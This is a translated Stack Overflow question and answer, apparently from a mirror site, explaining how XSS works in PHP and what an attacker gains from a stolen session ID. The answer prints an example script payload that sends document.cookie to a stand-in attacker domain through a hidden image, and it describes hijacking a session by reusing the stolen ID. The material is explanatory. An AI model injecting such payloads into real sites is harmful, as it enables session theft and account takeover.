个人中心
文章发布
退出
作者热门文章
- android - RelativeLayout 背景可绘制重叠内容
- android - 如何链接 cpufeatures lib 以获取 native android 库?
- java - OnItemClickListener 不起作用,但 OnLongItemClickListener 在自定义 ListView 中起作用
- java - Android 文件转字符串
25
4
所以,防止网站受到XSS攻击非常简单,你只需要使用htmlspecialchars函数就可以了。
但是,如果开发人员忘记使用它,攻击者/黑客可以做什么?他可以得到你的session_id,对吧?这是一个问题。他能用那个做什么?
非常感谢。
最佳答案
So, preventing website from XSS attack is very simple, you just need to use htmlspecialchars function and you are good.
没错。当您要重新显示用户控制的输入 时,可以在任何地方使用它。这涉及 HTTP 请求的所有部分: header 、正文和参数。
But if developer forgot to use it, what can attacker/hacker do?
他/她可以插入一些恶意的 HTML/脚本。例如。网页上的一些消息/评论中的以下内容:
<script>document.write('<img src="http://hackersdomain.com/fake.gif?' + escape(document.cookie) + '" width=0 height=0>');</script>
以上将从 mailicious 域请求图像以及文档 cookie 作为查询字符串。
He can get your session_id, right? And here is a question. What can he do with that?
session ID 存储在 cookie 中。一旦黑客得知已使用查询字符串中的 cookie 请求图像,他/她所要做的就是编辑浏览器的 cookie 以包含相同的 session ID,以作为原始用户登录。如果原始用户是站点管理员,这显然是非常危险的。
关于php - XSS 攻击是如何运作的?,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/3364427/
25
4
0
我是一名优秀的程序员,十分优秀!